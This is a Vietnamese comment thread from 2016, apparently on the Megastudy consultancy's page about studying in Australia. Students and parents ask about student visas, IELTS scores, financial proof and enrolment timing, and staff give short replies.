  hoaipt@megastudy.edu.vn: Chào em, nếu em chưa tốt nghiệp THPT tại Việt Nam thì em chỉ có thể đi học khóa dự bị đại học em nhé. Sau khi kết thúc chương trình dự bị đại học thì em sẽ vào năm 1 đại học
  Vào lúc: 26/10/2016, 10:07:56
 • Từ Thị Thanh Vân: Dạ..em chào trường ạ..dạ trường cho em hỏi là em vừa tốt nghiệp cao đẳng chuyên ngành tài chính ngân hàng bằng khá, điểm trung bình của em là 6.72, em dự định sang Úc du học khác ngành là ngành quản trị khách sạn của học viện William Angliss, Melbourne..trường cho em hỏi là bằng cấp cao đẳng của em có được trường W.Angliss công nhận và cho em rút ngắn thời gian học được không ạ..? em cảm ơn trường nhé..! :)
  Vào lúc: 23/10/2016, 15:57:15 - Trả lời

  hoaipt@megastudy.edu.vn: chào em, Với tình trạng hồ sơ của em sẽ vẫn có thể apply vào học ngành quản trị du lịch khách sạn của William Angliss. Việc có được rút bớt tín chỉ được hiểu là sẽ không phải học những môn học cùng tên còn phải tùy thuộc vào việc xét hồ sơ của trường em nhé.
  Vào lúc: 24/10/2016, 11:10:17
 • Quốc Chiến: E tốt nghiệp đại học 12/2015, mới thi ielts đc 4.5. Nếu làm hồ sơ du học Úc thạc sỹ trường Torrens, ngành kinh tế thì chi phí khóa học là bao nhiêu, thời gian làm hồ sơ và xin visa bao lâu?thanks
  Vào lúc: 22/10/2016, 22:49:50 - Trả lời

  hoaipt@megastudy.edu.vn: chào bạn, hiện tại các trường miễn chứng minh tài chính chỉ offer học tiếng anh không quá 30 tuần như vậy với trình độ tiếng anh của bạn hiện tại phải học quá 30 tuần sẽ hơi khó khăn trong việc xin thư mời và xin visa ( tỷ lệ đậu visa sẽ khôngcao). Chính vì thế, em nên cân nhắc thật kỹ khi sử dụng band điểm IELTS trên.
  Vào lúc: 24/10/2016, 11:08:16
 • Trần Phương Thảo: Em đang học lớp 11 ở Việt Nam và năm sau em có dự định qua úc học đại học. Vậy em nên tiến hành làm hồ sơ xin visa vào thời điểm nào ạ ? (em vẫn thi THPTQG ở Việt Nam )
  Vào lúc: 22/10/2016, 16:11:44 - Trả lời

  hoaipt@megastudy.edu.vn: chào em, ở Úc có kỳ nhập học tháng 2,7 một số trường có kỳ nhập học tháng 10. Chính vì thế nếu em vẫn muốn đi thi THPT thì em có thể lựa chọn kỳ nhập học tháng 10 hoặc tháng 2 năm sau. Chị lưu ý, nếu em chưa đủ điều kiện tiếng anh đầu vào thẳng thì em có thể nhập học bất kỳ lúc nào. Về việc nộp hồ sơ tốt nhất em nên nộp khi có xác nhận học bạ để trung tâm tư vấn du học tư vấn trường ( hoăc em lựa chọn) và các bước cần phải làm sớm nhất có thể em nhé.
  Vào lúc: 24/10/2016, 11:06:40
 • Lương Thị Hải Yến: Em muốn hỏi là e thi ielts overall là 5.0 nhưng nghe là 3.5! vậy xin hỏi có thể xin visa k ạ?
  Vào lúc: 21/10/2016, 12:43:12 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, với trường hợp của em nếu đi theo diện các trường miễn chứng minh tài chính người ta chỉ offer cho học sinh không quá 30 tuần. Nếu trong trường hợp em đi học đại học thì em phải học quá 30 tuần vậy cũng khó xin được thư mời và Visa cũng gặp khó khăn. Hy vọng em sẽ có quyết định đúng.
  Vào lúc: 24/10/2016, 10:57:12
 • Bùi Mạnh Thủy: Em muốn hỏi. E đã tốt nghiệp đại học vào năm 2014, ngành xây dựng dân dụng và công nghiệp đi làm được 2 năm tuy nhiên e không thích mảng xây dựng muốn chuyển qua bên kinh tế thì liệu có thể học chuyển ngành để học thạc sĩ chuyên ngành maketing hoặc quản trị doanh nghiệp bên Úc được không.Yêu cầu chứng chỉ tiếng anh ra sao? Tài chính để đi được là bao nhiêu ? Khi sang đó e học thạc sĩ thì thời gian e có thể làm thêm là 40h hay 20h/tuần ?Em xin cám ơn.
  Vào lúc: 15/10/2016, 13:00:31 - Trả lời

  hoaipt@megastudy.edu.vn: Dear em, Vs trường hợp của em hoàn toàn có thể chuyển đổi từ ngành xây dựng sang ngành kinh tế em nhé. Với chương trình thạc sỹ để vào thẳng các em cần có IELTS 6.5 không band điểm nào < 6.0. Về vấn để làm thêm, theo quy định của bộ di trú Úc du học sinh quốc tế được phép đi làm thêm 40h/2 tuần em nhé.
  Vào lúc: 17/10/2016, 09:16:34
 • huynh thị ngọc uyên: Cho tôi hỏi, tôi có 3 con học các lớp 11, 9,4. Tôi muốn cho các con đi học tại wollongong nước Úc , tôi có gia đình tại đó có thể bảo lãnh cho tôi theo chăm sóc các cháu và các con theo học . Vậy cho tôi hỏi tôi cần làm thủ tục như thế nào và chứng minh tài sản ra sao? Nếu các con đi học có đòi hỏi trình độ hay khả năng học k? (Hiện tại cháu lớp 4 và lớp 9 đạt học sinh giỏi các năm liên tục, cháu lớp 11 chỉ khá thôi)
  Vào lúc: 13/10/2016, 10:56:21 - Trả lời

  marketing@megastudy.edu.vn: Chào chị, Megastudy sẽ liên hệ với chị nhé!
  Vào lúc: 14/10/2016, 13:59:52
 • Anh Vũ: Em xin được tư vấn. E tốt nghiệp bậc đại học về ngành quản trị nhà hàng vào năm 2015, em cũng đã đi làm ở nhà hàng 1 năm. Bây giờ em thích ngành đầu bếp quá nên em muốn đi du học ở úc tại các trường nghề. Hiện tại e chưa có chứng chỉ tiếng Anh, em muốn qua nước úc để học khoá chứng chỉ tiếng Anh sau đó mới vào ngành. Em cũng đã có định hướng các trường em sẽ học rồi ạ. Vậy thì tình hình của em xin visa như thế nào em xin được quý công ty tư vấn ạ !!
  Vào lúc: 07/10/2016, 17:35:28 - Trả lời

  havtt@megastudy.edu.vn: Chào em, Lịch sử làm việc và học tập của em có sự phù hợp tuy nhiên vì học lùi bậc nên em cần được tư vấn hướng dẫn cụ thể về khóa học, thủ tục và giải trình visa cho hợp lý thì tỷ lệ mới tốt được. Tư vấn sẽ liên hệ với em để hướng dẫn em nhé. Cảm ơn em đã liên hệ
  Vào lúc: 10/10/2016, 11:58:07
 • Thu Thúy Nguyễn: Chào bạn ! Mình có bằng trung cấp kế toán và vừa mới sang nhật học trường tiếng. Mình muốn học xonng trường tiếng và học cả tiếng anh nữa , rồi sang úc du học. Vậy mình cần phải làm gì? Mong bạn trả lời thắc mắc của mình .
  Vào lúc: 06/10/2016, 21:37:43 - Trả lời

  havtt@megastudy.edu.vn: Chào bạn, Bạn cần chuẩn bị tốt về ngôn ngữ là tiếng Anh để sau khi kết thúc thời gian ở nhật sẵn sàng để học tại úc, đây cũng là thời gian để bạn tim hiểu về chương trình học và các trường tại úc, tư vấn của Megastudy có thể giúp bạn có thông tin chính xác nhé
  Vào lúc: 10/10/2016, 11:55:34
 • Nguyễn hoàng khánh linh: Cho e hỏi là bây giờ em đang học đại học năm thứ nhất. E muốn đi du học úc, thì yêu cầu về điểm số học tập là của năm cấp 3 hay năm đầu đại học ạ ?
  Vào lúc: 29/09/2016, 09:21:25 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, Hồ sơ của em cần cung cấp năm 1 đại học và 3 năm học cấp 3 em nhé.
  Vào lúc: 29/09/2016, 10:19:59
 • Nguyễn thị tuyết trinh: Cho em hỏi. E nộp đon xin visa duoc hơn 2 tuần r. Mà 10-10 e phải nhập hoc.hôm nAy đã là 27/9 nhưng cung k nhận đuoc cuộc đt nào của đsq. Có khi nào e fail visa hay trễ kì nhập học không ạ???
  Vào lúc: 27/09/2016, 14:16:16 - Trả lời

  Đào Hồng Anh: cậu ơi cậu nhận đc visa chưa
  Vào lúc: 08/11/2016, 14:32:34
  hoaipt@megastudy.edu.vn: Chào em, việc xét duyệt hồ sơ visa phía công ty tư vấn Du học không phải là người quyết định mà sẽ phụ thuộc vào phía lãnh sự quán - người xét duyệt hồ sơ em nhé. Chị nghĩ em sẽ có thông tin visa trước thời gian nhập học em nhé.
  Vào lúc: 29/09/2016, 10:19:24
  Đàm Yến: khi nào thì em nhận được kết quả xin visa?
  Vào lúc: 28/09/2016, 11:24:54
 • Nguyễn Quỳnh Trang: Cho e hỏi nhé: hiện tại e mới học lớp 8, định rằng năm sau sẽ đi du học tại Úc. E không có người thân ở bên ấy, vốn tiếng anh lại không được tốt lắm. Đây là trường hợp bắt buộc, vậy cho e hỏi phải làm như thế nào?
  Vào lúc: 26/09/2016, 21:05:05 - Trả lời

 • thiên bảo: Làm ơn cho mình hỏi. Con mình đang học 12, giờ muốn xin visa đi Úc học thì phải xin ở đâu
  Vào lúc: 26/09/2016, 12:50:14 - Trả lời

 • Lê Giang: xin chào. con tôi nam nay 16 tuổi tôi muốn con đi du hoc uc. Vậy tôi là mẹ co đuoc đi theo con kg
  Vào lúc: 24/09/2016, 14:25:47 - Trả lời

  hoaipt@megastudy.edu.vn: Chào chị, Với những học sinh chưa đủ 18 tuổi bố mẹ hoàn toàn có thể đi theo cùng để chăm sóc chị nhé!
  Vào lúc: 29/09/2016, 10:18:10
 • Tran Thi Loan: Chao anh(chi). Em da tot nghiep cao dang duoc 1 nam voi bang kha,nhung em khong co chung chi tieng anh. Em muon di du hoc o Uc thi phai nhu the nao aj. Anh(chi) tu van giup em voi aj. Em xin cam on!
  Vào lúc: 22/09/2016, 22:26:16 - Trả lời

  hoaipt@megastudy.edu.vn: chào em, để tỷ lệ visa đậu cao nhất em nên trang bị cho mình ngôn ngữ nhất định.
  Vào lúc: 23/09/2016, 09:06:23
 • Nguyễn Kiều Thủy: Em đang học cao đẳng dược năm 2.Em dự định làm giấy đi du học úc mà kết quả học tập năm nhất em chỉ được trung bình yếu, lại còn bị nợ một môn, mà như gia đình em có thể chứng minh tài chính đủ để em đi du học vậy với kết quả như vậy có khó khăn gì đến việc xin visa du học úc không ạ?
  Vào lúc: 22/09/2016, 21:42:19 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, với trường hợp của em hoàn toàn có thể làm hồ sơ em nhé. Tư vấn viên sẽ liện hệ trực tiếp tới em.
  Vào lúc: 23/09/2016, 09:05:06
 • MAI THỊ LUYẾN: Cho em hỏi:Em đã tốt nghiệp đại học văn hóa Tp Hồ Chí Minh năm 2011,xếp loại bằng giỏi chuyên ngành văn hóa học. Nhà em có chị gái và em gái đã định cư tại Úc, có thể bảo lãnh và chứng minh tài chính khi em qua đây học. Em đã lập gia đình hiện đang có con nhỏ 6thang, giờ em muốn học cao học ngành của em, anh chị có thể tư vấn chọn trường nào mà xin visa không cần bằng Tiếng Anh không ah.
  Vào lúc: 14/09/2016, 10:14:21 - Trả lời

  hoaipt@megastudy.edu.vn: Chào bạn, hiện tại ở bên Úc sẽ có những trường chấp nhận làm bài thi test với trường bạn có thể lựa chọn hướng nay. Nhưng dù có chứng chỉ IELTS hay làm bài thi test với trường thì bạn cũng phải là người có tiếng anh thì tỷ lệ visa của bạn mới tốt bạn nhé!
  Vào lúc: 14/09/2016, 16:39:42
 • Huynh Anh Minh: Em hiện đang học lớp 11, liệu em có nên rút học bạ khi chưa có visa ko ạ? E đã có giấy nhập học ở trường bên Úc
  Vào lúc: 13/09/2016, 10:45:27 - Trả lời

  hoaipt@megastudy.edu.vn: chào em, về trường hợp của em em nên cân nhắc trước khi quyết định em nhé
  Vào lúc: 14/09/2016, 16:44:38
 • Nguyễn thi thao: E tot nghiệp nam 2011 e khong co bang chung chi tieng anh..vảy co the lam di du học Úc khong a
  Vào lúc: 10/09/2016, 21:23:26 - Trả lời

  hoaipt@megastudy.edu.vn: chào em, để thuận lợi nhất cho việc xin visa em nên có tiếng anh mức tối thiểu ví dụ như IELTS 4.5 hoặc các chứng chỉ quốc tế khác tương đương em nhé.
  Vào lúc: 14/09/2016, 16:44:06
 • Phạm Phương Thảo: Cho em hỏi : Du học sinh qua Úc. Vậy đại học sẽ thi như thế nào và có bao nhiêu môn ? E xin cảm ơn
  Vào lúc: 09/09/2016, 20:03:23 - Trả lời

  hoaipt@megastudy.edu.vn: chào em, về hình thức học bên Úc các bạn có thể học những môn làm tiểu luận, thuyết trình hay thi phụ thuộc vào môn học và phụ thuộc vào giáo viên. Về môn học sẽ phụ thuộc vào môn học em đăng ký nhưng thông thường học sinh sẽ đăng ký 4 môn học cho một kỳ em nhé!
  Vào lúc: 10/09/2016, 10:38:19
 • Nguyễn Dung: Em muốn hõi, e đã tốt nghiệp đại học vào năm 2011, ngành thiet kế nội thất, đi làm được 4 năm. Tuy nhiên vào năm 2014 e đã nghĩ làm, và chuyển hướng công việc sang học làm bánh đễ mong có cơ hội đi du học ở Le Condor Bleu. Hiện tại e đã có chứng chỉ nghề bánh, và đang học thêm 1 chứng chỉ nghề bánh nữa. Xin hõi e có thể apply vào chương trình cao đẳng nâng cao ngành bánh ở Le Condor Bleu đươc không. Ba và anh ruột có thể chứng minh tài chính dùm em được không.
  Vào lúc: 06/09/2016, 13:46:29 - Trả lời

  hoaipt@megastudy.edu.vn: Chào bạn, về trường hợp của bạn tư vấn viên sẽ liên hệ trực tiếp và tư vấn thông tin tới bạn.
  Vào lúc: 07/09/2016, 12:10:52
 • Tùng Lê: cho em hỏi,hiện em là du học sinh Úc,em biết mình là có thể xin thư mời mời bà mẹ qua, nhưng em không biết em có thể đứng ra xin cho bạn của em qua được không ạ?em cảm ơn
  Vào lúc: 02/09/2016, 17:35:58 - Trả lời

  hoaipt@megastudy.edu.vn: chào em, em hoàn toàn có thể mời bạn em qua chơi được nhé.Hồ sơ cứ chuẩn bị như bình thường em nhé.
  Vào lúc: 06/09/2016, 09:31:26
 • Bùi Minh Sơn: Cho em hỏi: Nếu đãn có Visa và ngày nhập học thì em được qua Úc sớm nhất bao lâu ạ?
  Vào lúc: 01/09/2016, 15:00:12 - Trả lời

 • Trương Hồ bảo: tôi có con 8 tuổi và đang tìm hiểu về chương trình du học úc có người giám hộ. Tôi đã đọc qua thông tin trên website http://www.border.gov.au/ và mẫu 157N cho người giám hộ. Nhưng tôi lại nhận được thông tin là việc apply trường học cho con tôi ở tiểu bang khác nhau thì hồ sơ sẽ khác nhau (ví dụ bang NSW, VIC, SA). Hiện tôi đang khá thắc mắc về thông tin này. Xin công ty giải đáp
  Vào lúc: 29/08/2016, 14:09:47 - Trả lời

 • Tường Vy: Hiện tại e đang học thpt , e đã nộp hồ sơ đi du học úc từ 1/7 rồi mà vẫn chưa có kết quả e muốn hỏi : - bao lâu nữa thì e ms có visa ạ? Tầm mấy tuần nữa thì đc - em có thể nghỉ học ở trg thpt ở Việt Nam k? - lúc trước e định làm hồ sơ tại một công ty du học nhưng sau đó lại k làm ở chỗ ấy nữa mà chuyển sang chỗ khác làm như vậy chỗ tư vấn du học cũ có thể làm ảnh hưởng xấu gì tới việc xin visa k ạ vì em đã chụp cho họ giấy tờ cần thiết làm du học r Mong anh chị giải đáp hết thắc mắc của e sớm nhất có thể . Em cảm ơn
  Vào lúc: 25/08/2016, 13:49:55 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, về kết quả visa khi nào có thì phía công ty tư vấn du học sẽ không thể biết được và không có quyền quyết định. Tốt nhất em nên học tiếp tại VN cho đến khi có thông tin về kết quả visa em nhé. Việc em nộp hồ sơ qua agent khác và rút không làm nữa điều này không ảnh hưởng đến việc xin visa của em.
  Vào lúc: 25/08/2016, 15:39:53
 • Bùi thị lan: E đag trong quá trình đợi phỏng vấn,,, nhưng do e chưa đủ 18 tuổi, và hôm nay bên bộ di trú có gọi và o phỏng vấn e mà xin sđt của bố mẹ e,,, nhưng họ gọi cho mẹ e thì o được,,, vậy cho e hỏi họ có gọi lại o ạ
  Vào lúc: 23/08/2016, 14:15:58 - Trả lời

  marketing@megastudy.du.vn: Thông thường họ sẽ gọi lại lầ nữa tuy nhiên em nên nói với mẹ để ý điện thoại vì sứ quán gọi 2-3 lần mà không được thì cũng không hay và rất có thể sứ quán cũng sẽ không gọi lại nữa em nhé!
  Vào lúc: 24/08/2016, 16:48:36
 • nguyen ngoc: Mình năm nay 32 tuổi, muốn học master về logistics. Hiện mình chưa có ielts, định qua đó rồi học luôn. Nhờ các bạn tư vấn giúp.
  Vào lúc: 21/08/2016, 17:13:28 - Trả lời

  hoaipt@megastudy.edu.vn: Chào bạn, về trường hợp của bạn tư vấn viên sẽ trực tiếp liên hệ với bạn.
  Vào lúc: 23/08/2016, 09:05:58
 • Quochung: Chào anh chị, em phải học khóa tiếng anh trước khi học khóa chính thức (tiến sĩ) thì xin visa cho khóa học nào? Em cám ơn!
  Vào lúc: 20/08/2016, 02:51:41 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em,về trường hợp của em sẽ xin visa cho khóa học cao nhất ( tiến sỹ) em nhé. Chúc em thành công!
  Vào lúc: 20/08/2016, 09:21:26
 • đỗ nam phương: em muốn tìm hiểu để được đi du học úc ạ!
  Vào lúc: 19/08/2016, 16:03:48 - Trả lời

  marketing@megastudy.edu.vn: Chào Phương, Megastudy sẽ liên hệ tư vấn giúp em nhé!
  Vào lúc: 20/08/2016, 08:50:52
 • Nguyễn kim oanh: Cho em hỏi em phỏng vấn visa du học Úc nhưng e trả lời không tốt ,1tuan rồi vẫn chưa có kết quả vậy có phải e bị rớt không
  Vào lúc: 18/08/2016, 08:26:19 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, Em vui lòng liên hệ công ty hỗ trợ làm hồ sơ cho em để được tư vấn chi tiết nhé, hoặc chờ đợi kết quả vì sau phỏng vấn 1 tuần vẫn chưa phải thời gian quá lâu để kế kết luận là trượt visa, chức em may mắn
  Vào lúc: 18/08/2016, 16:33:29
 • Thanh xuyen: Chào anh chị. Em vừa học xong lớp 11 và dự định đi du học. E đã xin được visa nhưng khi qua Úc em muốn đổi ngành học thì có ảnh hưởng nhiều tới visa của em không ạ ? Em cảm ơn trước ạ.
  Vào lúc: 15/08/2016, 20:08:58 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, Việc đổi ngành và đổi trường là việc nên hạn chế làm nhất bởi trong những trường hợp rủi ro em sẽ bị thu Visa em nhé. Hy vọng em có những lựa chọn và quyết định đúng.
  Vào lúc: 16/08/2016, 09:09:17
 • Phương: Em năm nay 16 tuổi , em đã nộp hồ sơ xin visa du học Úc từ 1/7 rồi vậy hạn cuối có visa là khi nào ạ. E cần biết gấp vì bây giờ em đã pải vào học chính thức tại trường hiện tại mà vẫn chưa có kết quả .
  Vào lúc: 14/08/2016, 14:16:54 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, Em sẽ cần làm đơn gửi sang trường em đăng ký nêu rõ tình hình để trường gia hạn thời gian nhập học cho em! Chúc em may mắn và thành công!
  Vào lúc: 16/08/2016, 09:07:54
 • Lâm Nguyễn: Chào anh chị , em trai tôi lúc trước chỉ học đến lớp 11 thì nghỉ học , sau đó không đi học tiếp trong 4-5 năm . Bây giờ ở việt nam đang học nghành đầu bếp . Nếu em tôi muốn xin qua úc học thêm về đầu bếp thì có được không ?
  Vào lúc: 14/08/2016, 02:17:45 - Trả lời

 • Huynh như: Cho e hỏi nếu e xin học ở một trường và đã có visa nhung khi qa Úc e muốn thây đổi học trường khác vật có gi rắc rối không cam ơn
  Vào lúc: 08/08/2016, 21:53:27 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, trước khi lựa chọn làm hồ sơ em cần cân nhắc kỹ các trường em sẽ dự định học để tránh trường hợp khi sang đó chuyển trường đổi trường sẽ rất phức tạp và có khi gặp rủi ro về visa em nhé!
  Vào lúc: 09/08/2016, 10:18:37
 • nguyễn tiến huy: anh(chị) cho em hỏi, như thông tin ở trên, "Visa bậc 1: Khi đăng ký các khóa học đại học, thạc sỹ, tiến sỹ tại 41 trường trong danh sách xét visa bậc 1, sinh viên không cần phải chứng minh nguồn gốc tài chính, chỉ cần sổ tiết kiệm, không cần chứng chỉ tiếng Anh, không phỏng vấn xin visa." thì em tốt nghiệp THPT được hơn 2 năm em có thể đăng kí xin visa bậc 1 học Đại Học được không ạ. và nếu được thì e cần phải nộp những hồ sơ gì và ngành em muốn theo đuổi và học tập là ngành Graphic Design thì trong 41 trường thì có trường nào em có thể theo học ngành này ạ. và xác xuất đậu vào các trường có cao không ạ. em cảm ơn
  Vào lúc: 04/08/2016, 21:23:14 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, hiện tại từ ngày 01/07/2016 chính phủ Úc đã có quyết định mới về việc thu hút du học sinh tham gia học tập tại Úc. Dưới đây là danh sách các trường được miễn chứng minh tài chính em nhé. Còn tại tất cả các trường đều phải chứng minh tài chính khi tham gia du học tại Úc dành cho sinh viên Việt Nam. http://megastudy.edu.vn/du-hoc-uc/du-hoc-uc-danh-sach-cac-truong-uu-tien-khong-chung-minh-tai-chinh-tu-sau-172016-a882.html
  Vào lúc: 05/08/2016, 08:59:29
 • Vong vi thien: Cho e hỏi, e tot nghiep thpt 2nam roi tb 7.8 1nam đi làm và hien đi du học thpt tại đài loan , kết qua học tập tại dloan loại giỏi, e có chứng chỉ phổ thông tieng anh A,B thôi ạ, e xin visa bậc 1 học cử nhân đại học có cơ hội đậu cao k ạ, trc học dh e còn muốn học thêm khoá tieng anh trc khi nhập dhoc nua ạ
  Vào lúc: 04/08/2016, 10:52:18 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, hồ sơ của em hoàn toàn có thể xin được visa du học em nhé. Tuy nhiên, em không thể sử dung chứng chỉ tiếng anh trên để nộp hồ sơ du học mà em cần phải có một chứng chỉ tiếng anh quốc tế em nhé!
  Vào lúc: 04/08/2016, 14:02:01
 • trần ngọc anh phương: Cho em hỏi. nếu xin visa diện lao động tay nghề 457...thì theo qui định mới thì band điểm ielts phải là 5.nhưng điểm tối thiểu mỗi môn thi phải là 4.5 . vậy nó 4 môn đều 4.5 thì em có đủ điều kiện xin visa không..Và nếu trường hợp không đủ yêu cầu về điểm ielts thì mình có nộp đơn xin visa 457 được không ak...cảm ơn
  Vào lúc: 30/07/2016, 15:01:10 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, Công ty chị chỉ làm hồ sơ theo diện du học chính vì thế thông tin em hỏi chị không thể hỗ trợ thông tin tới em!
  Vào lúc: 03/08/2016, 13:56:14
 • Vũ quyên: Chào chị. E sn 1992 e đã học xong cao đẳng y và nhận bằng trung bình khá năm 2013. Hiện tại e đã lấy ck và có con. Bây giờ e muốn đi du học úc có được không ạ.
  Vào lúc: 29/07/2016, 13:20:07 - Trả lời

  Vũ quyên: Nghỉ học lâu năm. Muốn đi du học úc thì có khó khăn k ạ
  Vào lúc: 30/07/2016, 09:15:15
  hoaipt@megastudy.edu.vn: Chào em, Em hoàn toàn có thể nộp hồ sơ du học Úc em nhé, vui lòng liên hệ Megastudy 04 39727100 để được tư vấn và chuẩn bị hồ sơ sớm em nhé
  Vào lúc: 29/07/2016, 13:53:55
 • Vũ Thị Hương: Tôi xin hỏi: Ngoài tiền học phí ra thì phí dịch vụ cho 1 sinh viên du học Úc là bao nhiêu? + tiền hoc phí và các chi phí khác ntn? Bạn có thể cho tôi biết cụ thể được không ạ?
  Vào lúc: 29/07/2016, 13:06:51 - Trả lời

  hoaipt@megastudy.edu.vn: Chào bạn, tư vấn Megastudy sẽ liên hệ lại để tư vấn chi tiết các khoản chi phí cho bạn nhé, vì tùy trương hợp và đăng ký học các trường cụ thể chi phí sẽ khác nhau bạn ạ,hoặc bạn có thể liên hệ trực tiếp văn phòng 04 39727100 để được tư vấn chi tiết
  Vào lúc: 29/07/2016, 13:56:06
 • Thuỳ Linh: Cho em hỏi là em đã nộp hồ sơ du học ngày 27/6 và chuẩn bị tuần sau là tuần thứ 6 nhưng tại sao em vẫn chưa biết kết quả. Em cảm ơn
  Vào lúc: 29/07/2016, 11:59:41 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, em vui lòng liên hệ với công ty đã làm hồ sơ du học cho em để được hỗ trợ kiểm tra tình trạng hồ sơ em nhé. Việc xét hồ sơ lên đến 8 tuần hoặc hơn hoàn toàn là chuyện bình thường với các hồ sơ cần xét duyệt kỹ em nhé.
  Vào lúc: 29/07/2016, 13:57:33
 • Nguyễn Đức Minh Thy: Cho em hỏi là em đã có visa rồi thì trước khi nhập học bao lâu em mới được nhập cảnh vào Úc ạ ? Em cảm ơn ạ.
  Vào lúc: 28/07/2016, 13:41:14 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, sau khi có visa em có thể bay sang úc bất cứ lúc nào trước ngày nhập học nhé
  Vào lúc: 29/07/2016, 13:58:12
 • Hoài Dương: Chào chị ! Em nay 23 tuổi, đã tốt nghiệp năm 2012, hiện tại em đang học IELTS, khoảng thời gian 2013 -> 1015 em ko có đi học tiếp ạ. Vậy xin chị cho em biết hiện tại nếu em có bằng IELTS thì có thể xin du học được không ạ hoặc em nên làm sao để được qua Úc ạ? Mong chị giải đáp giúp em! Cảm ơn ạ.
  Vào lúc: 27/07/2016, 17:16:34 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, em có thể nộp hồ sơ em nhé, tư vấn sẽ liên hệ để hướng dẫ và tư vấn giúp em
  Vào lúc: 29/07/2016, 14:00:15
 • Ngọc Nhi: Dạ, cho em hỏi. Năm nay em 27 tuổi, em có ý định đi du học tại Úc cao đẳng để liên thông lên đại học. Ngày trước, em có học đại học đến năm 3 nhưng bỏ giữa chừng vì điều kiện kinh tế không thể tiếp tục học, em tốt nghiệp cấp 3 chỉ được loại trung bình, 5.7 lớp 12. Em đã có bằng IELTS 7.5. Điều kiện kinh tế của em đã ổn sau mấy năm tập trung làm việc kiếm tiền, giờ em muốn tiếp tục lại việc học của mình. Vậy trường hợp của em có đủ điều kiện để đi du học và có khó xin visa không ạ? Em cám ơn.
  Vào lúc: 25/07/2016, 23:49:45 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, với tình hình hồ sơ hiện tại của em vẫn có thể triển khai hồ sơ xin visa du học. Tuy nhiên, nếu so mặt bằng với các hồ sơ trước thì hồ sơ của em sẽ cần được giải trình chi tiết hơn và cũng sẽ có nhiều câu hỏi cần giải đáp đối với phía người xét duyệt hồ sơ em nhe.
  Vào lúc: 27/07/2016, 09:10:02
 • Nguyen Ngọc Quỳnh: Cho em hỏi là e ra trường gần 2 năm nhưng em tốt nghiệp trung cấp dược và đang học ielts để lấy bằng ielts 5.0. Vậy đến khi em làm hồ sơ du học tỷ lệ đậu visa cao không a/c? Thời gian em ra trường vẪn đi làm và khi làm hồ sơ du học nhà thuốc sẽ chứng nhận trong thời gian đó em có làm việc ở đó. Hay em có cần liên Thoòng lên cao đẳng để dễ hơn không a/c? Tại em muốn Hc Cđ bên Úc chi phí sẽ thấp hơn.
  Vào lúc: 25/07/2016, 19:33:26 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, với tình hình hiện tại của em hoàn toàn có thể làm hồ sơ du học Úc ngành y tá, điều dưỡng, dược. Về yêu cầu đầu vào thẳng cho hệ cao đẳng ngành này là ILETS 5.0 hoặc chứng chỉ quốc tế khác tương đương. Việc học cao đẳng hay đại học không ảnh hưởng nhiều vào tỷ lệ visa du học. Quan trọng ở việc kế hoạch của em đi du học là thế nào em nhé.
  Vào lúc: 27/07/2016, 09:08:13
 • Phan Linh: Chào anh chị. Em trai của em vừa thi THPT xong, có đăng ký xét ĐH, và điểm khối A của nó là 22.1. Hiện giờ nó đang có nguyện vọng đi du học ở Úc. Vậy chỉ cần điểm trong Giấy chứng nhận TN hay nộp hồ sơ vào trường nào đó, có giấy báo trúng tuyển hơn ạ?
  Vào lúc: 24/07/2016, 17:27:09 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, để làm hồ sơ em cần cung cấp đầy đủ tất cả các giấy tờ em có thể cung cấp sau đó người phụ trách làm hồ sơ sẽ tư vấn hướng phù hợp nhất với trường hợp của em. Nhưng thông thường sẽ nộp cả giấy trúng tuyển vào đại học em nhé!
  Vào lúc: 25/07/2016, 09:02:17
 • phan nhật lệ: nếu em có chị họ ở bên úc thì chị có thể cmtc cho em đk k ạ (bố e với mẹ chị là 2ae ruột)
  Vào lúc: 22/07/2016, 23:36:59 - Trả lời

  hoaipt@megastudy.edu.vn: với trường hợp của em chị họ em có thể chứng minh tài chính cho em được. Nhưng thủ tục người bảo lãnh bên Úc sẽ khó khăn hơn và tỷ lệ đậu visa sẽ không được cao bằng.
  Vào lúc: 25/07/2016, 09:00:32
 • phan nhật lệ: cho em hỏi năm nay trường ACU úc có cần cmtc k ạ .em cảm ơn
  Vào lúc: 22/07/2016, 19:29:09 - Trả lời

  hoaipt@megastudy.edu.vn: Chào em, trong danh sách các trường miễn chứng minh tài chính không có ACU em nhé. Chính vì thế khi làm hồ sơ thủ tục mình cứ làm như bình thường em nhé!
  Vào lúc: 25/07/2016, 08:58:59
 • toan: Cho hoi nam nay em thi tot nghiep thpt khog thi dai hoc zay em co dc di du hoc uc khong.em khong he pit tieg anh
  Vào lúc: 21/07/2016, 21:31:55 - Trả lời

  marketing@megastudy.edu.vn.vn: Chào em! Việc không thi ĐH không ảnh hưởng gì đến việc đi du học Úc, em vẫn có thể làm hồ sơ du học được, tuy nhiên chị khuyên em nên có tiếng anh IELTS tối thiếu 4.5 để thủ tục xét duyệt visa dễ dàng hơn em nhé.
  Vào lúc: 22/07/2016, 08:40:27
 • toan: Cho hoi nam nay em thi tot nghiep thpt khog thi dai hoc zay em co dc di du hoc uc khong.em khong he pit tieg anh
  Vào lúc: 21/07/2016, 21:31:54 - Trả lời

 • Dương Nguyễn: xin chào!Em muốn đi du học Úc nhưng bố em 3 năm trc đã định cư bất hợp pháp tại Úc. Vậy em có gặp khó khăn gì về xin visa ko ạ? Và có thể giải quyết được vấn đề không ạ? Em cảm ơn ạ
  Vào lúc: 20/07/2016, 22:00:15 - Trả lời

